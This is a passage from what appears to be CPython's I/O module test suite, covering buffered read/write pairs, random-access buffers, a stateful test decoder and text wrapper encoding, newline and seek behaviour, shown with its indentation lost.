self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings() as w:
warnings.simplefilter("always", DeprecationWarning)
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
self.assertEqual(len(w.warnings), 1)
warning = w.warnings[0]
self.assertTrue(warning.category is DeprecationWarning)
self.assertEqual(str(warning.message),
"max_buffer_size is deprecated")
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEquals(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEquals(b"as", rw.read(2))
self.assertEquals(2, rw.tell())
rw.seek(0, 0)
self.assertEquals(b"asdf", rw.read(4))
rw.write(b"asdf")
rw.seek(0, 0)
self.assertEquals(b"asdfasdfl", rw.read())
self.assertEquals(9, rw.tell())
rw.seek(-4, 2)
self.assertEquals(5, rw.tell())
rw.seek(2, 1)
self.assertEquals(7, rw.tell())
self.assertEquals(b"fl", rw.read(11))
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEquals(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEquals(b"ef", read_func(bufio, 2))
self.assertEquals(6, bufio.tell())
bufio.flush()
self.assertEquals(6, bufio.tell())
self.assertEquals(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEquals(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEquals(b"12345fghi", raw.getvalue())
self.assertEquals(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
class CBufferedRandomTest(BufferedRandomTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(b'oiabcd'), '')
self.assertEquals(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEquals(t.encoding, "latin1")
self.assertEquals(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEquals(t.encoding, "utf8")
self.assertEquals(t.line_buffering, True)
self.assertEquals("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEquals(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEquals(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEquals(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEquals(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEquals(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEquals(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEquals(got_line, exp_line)
self.assertEquals(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEquals(txt.readlines(), expected)
txt.seek(0)
self.assertEquals(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEquals(buf.closed, False)
self.assertEquals(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEquals([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.tell(), 0)
self.assertEquals(f.read(), "abc")
cookie = f.tell()
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.read(2), "ab")
self.assertEquals(f.read(1), "c")
self.assertEquals(f.read(1), "")
self.assertEquals(f.read(), "")
self.assertEquals(f.tell(), cookie)
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.seek(0, 2), cookie)
self.assertEquals(f.write("def"), 3)
self.assertEquals(f.seek(cookie), cookie)
self.assertEquals(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEquals(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEquals(f.tell(), p0)
self.assertEquals(f.readline(), "\xff\n")
self.assertEquals(f.tell(), p1)
self.assertEquals(f.readline(), "\xff\n")
self.assertEquals(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEquals(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEquals(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEquals(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEquals(s, str(prefix, "ascii"))
self.assertEquals(f.tell(), prefix_size)
self.assertEquals(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEquals(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEquals(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEquals(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEquals(f.read(), data * 2)
f.seek(0)
self.assertEquals(f.read(), data * 2)
self.assertEquals(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, "AA\nBB")
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEquals(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEquals(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEquals(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEquals(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEquals(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEquals(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEquals(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEquals(content.count("Thread%03d\n" % n), 1)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
class PyTextIOWrapperTest(TextIOWrapperTest):
pass
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEquals(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEquals(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
